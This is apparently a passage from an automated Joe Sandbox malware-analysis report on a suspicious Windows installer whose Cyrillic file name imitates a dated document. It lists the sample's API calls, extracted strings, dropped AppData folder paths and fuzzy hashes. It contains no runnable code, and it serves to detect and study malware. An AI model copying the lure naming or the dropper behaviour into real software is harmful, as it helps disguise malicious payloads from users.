                                                              • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                              • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                              • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                              • Part of subcall function 004062E4: CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                            • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
                                                              • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                              • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
                                                              • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: A$C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean$Remove folder:
                                                            • API String ID: 2624150263-74987778
                                                            • Opcode ID: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                            • Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
                                                            • Opcode Fuzzy Hash: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                            • Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                            Strings
                                                            • C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen, xrefs: 00402154
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen
                                                            • API String ID: 542301482-3772440268
                                                            • Opcode ID: bad8c02c9a5232ae2fe7c83ed2c0402b497b8bb1bc98c16d71f743dd1851b813
                                                            • Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
                                                            • Opcode Fuzzy Hash: bad8c02c9a5232ae2fe7c83ed2c0402b497b8bb1bc98c16d71f743dd1851b813
                                                            • Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: p!C$p!C
                                                            • API String ID: 0-3125587631
                                                            • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                            • Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
                                                            • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                            • Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 2a574175ecbbc16c159877bdabd45a4d71ca268d0464789ebb34cd10c835fca0
                                                            • Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
                                                            • Opcode Fuzzy Hash: 2a574175ecbbc16c159877bdabd45a4d71ca268d0464789ebb34cd10c835fca0
                                                            • Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                            • Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
                                                            • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                            • Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404363
                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
                                                            • GetSysColor.USER32(?), ref: 00404391
                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
                                                            • lstrlenW.KERNEL32(?), ref: 004043B2
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040442D
                                                            • SendMessageW.USER32(00000000), ref: 00404434
                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040445F
                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
                                                            • SetCursor.USER32(00000000), ref: 004044B3
                                                            • ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,00000001), ref: 004044C8
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
                                                            • SetCursor.USER32(00000000), ref: 004044D7
                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404506
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                            • String ID: (B@$N$Remove folder: $open
                                                            • API String ID: 3615053054-292669770
                                                            • Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                            • Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
                                                            • Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                            • Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextW.USER32(00000000,petrels,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F$petrels
                                                            • API String ID: 941294808-30437299
                                                            • Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                            • Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
                                                            • Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                            • Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrcpyW.KERNEL32(004308E8,NUL), ref: 00405D8E
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
                                                            • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
                                                              • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                              • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                            • GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
                                                            • wsprintfA.USER32 ref: 00405DF6
                                                            • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                            • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
                                                            • GlobalFree.KERNEL32(00000000), ref: 00405EDF
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
                                                              • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,80000000,00000003,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00405C29
                                                              • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00405C4B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                            • API String ID: 222337774-899692902
                                                            • Opcode ID: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                            • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                            • Opcode Fuzzy Hash: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                            • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                            • CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                            • CharNextW.USER32(?,00000000,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                            • CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
                                                            • *?|<>/":, xrefs: 00406336
                                                            • "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe", xrefs: 004062E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-1324219634
                                                            • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                            • Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
                                                            • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                            • Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404198
